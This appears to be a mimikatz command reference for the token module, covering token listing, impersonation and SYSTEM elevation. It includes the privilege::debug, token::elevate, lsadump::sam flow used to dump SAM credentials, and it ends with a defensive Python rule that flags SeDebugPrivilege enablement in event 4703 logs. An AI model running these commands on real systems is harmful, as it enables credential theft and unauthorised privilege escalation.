token
Manipulate Windows access tokens. Used to impersonate other users and elevate to SYSTEM.
Prerequisites
mimikatz # privilege::debug
whoami
Display current token/identity information.
mimikatz # token::whoami
list
Enumerate all accessible tokens on the system. Shows available tokens that can be impersonated.
mimikatz # token::list [/user:<username>] [/id:<pid>]
Options
- /user:<username> - filter by username
- /id:<pid> - filter by process ID
elevate - Token Impersonation / SYSTEM
Impersonate a token, most commonly used to elevate to SYSTEM. Required before lsadump::sam and other operations that need SYSTEM access.
mimikatz # token::elevate [/domainadmin] [/admin] [/id:<pid>] [/user:<username>]
Options
- (no flags) - elevate to SYSTEM (uses the NT AUTHORITY\SYSTEM token from a SYSTEM process)
- /domainadmin - impersonate a domain admin token (if available on the system)
- /admin - impersonate any local admin token
- /id:<pid> - steal token from specific process
- /user:<username> - steal token from specific user's process
Examples
# Elevate to SYSTEM (most common)
mimikatz # token::elevate
# Steal domain admin token
mimikatz # token::elevate /domainadmin
# Steal from specific PID
mimikatz # token::elevate /id:4
# Common flow for SAM dump
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
revert
Revert back to the original token (undo impersonation).
mimikatz # token::revert
run
Run a command under an impersonated token.
mimikatz # token::run /process:<exe> [/id:<pid>] [/user:<username>]
Notes
- token::elevate is typically used before lsadump::sam, lsadump::secrets, lsadump::cache
- SYSTEM token impersonation works because Windows services run as SYSTEM and their tokens are accessible to local admins
- token::revert is important for cleanup; staying as SYSTEM can cause unexpected behavior
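A detection-side example, added here and not part of the cheat sheet: the privilege::debug step that precedes token::elevate enables SeDebugPrivilege in the mimikatz process, which Windows records as Security event 4703 ("A user right was adjusted") when the "Audit Token Right Adjusted" subcategory is enabled. The script below parses a constructed key=value export of such events and flags non-allowlisted processes that enable SeDebugPrivilege; the export format, allowlist entries and paths are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample of Security event 4703 records, flattened to one key=value line each
# as a SIEM export might present them. Not real logs. 4703 is only written when the
# "Audit Token Right Adjusted" subcategory is enabled; EnabledPrivilegeList is "enabled" here.
SAMPLE_EVENTS = """\
time=2024-05-01T10:00:01 id=4703 pid=0x1a2c image=C:\\Program Files\\Microsoft Visual Studio\\devenv.exe enabled=SeDebugPrivilege
time=2024-05-01T10:02:10 id=4703 pid=0x2f40 image=C:\\Users\\bob\\Downloads\\m.exe enabled=SeDebugPrivilege
time=2024-05-01T10:03:00 id=4703 pid=0x3100 image=C:\\Windows\\System32\\svchost.exe enabled=SeImpersonatePrivilege
time=2024-05-01T10:04:30 id=4703 pid=0x3310 image=C:\\Tools\\procdump64.exe enabled=SeDebugPrivilege, SeBackupPrivilege
"""

# Images that legitimately enable SeDebugPrivilege (debuggers, EDR agents); assumed, tune per host.
DEBUG_ALLOWLIST = {
    "c:\\program files\\microsoft visual studio\\devenv.exe",
}
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")

def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value record; values may contain spaces (image paths)."""
    return {k: v for k, v in FIELD_RE.findall(line)}

def detect_sedebug_enablement(export: str) -> List[Dict[str, str]]:
    """Flag processes enabling SeDebugPrivilege outside the allowlist (the step
    privilege::debug performs before token::elevate). Severity is raised when the
    image lives under a user-writable path; each PID is reported once."""
    alerts, seen = [], set()
    for line in export.splitlines():
        ev = parse_event(line)
        if ev.get("id") != "4703":
            continue
        privs = {p.strip() for p in ev["enabled"].split(",")}
        if "SeDebugPrivilege" not in privs:
            continue
        image = ev["image"].lower()
        if image in DEBUG_ALLOWLIST or ev["pid"] in seen:
            continue
        seen.add(ev["pid"])
        severity = "high" if image.startswith(USER_WRITABLE) else "medium"
        alerts.append({"time": ev["time"], "pid": ev["pid"], "image": ev["image"], "severity": severity})
    return alerts

if __name__ == "__main__":
    for a in detect_sedebug_enablement(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['time']} pid={a['pid']} enabled SeDebugPrivilege: {a['image']}")
```

Event 4703 fires for every right adjustment on a busy host, so the allowlist and the user-writable path heuristic are what keep this rule actionable.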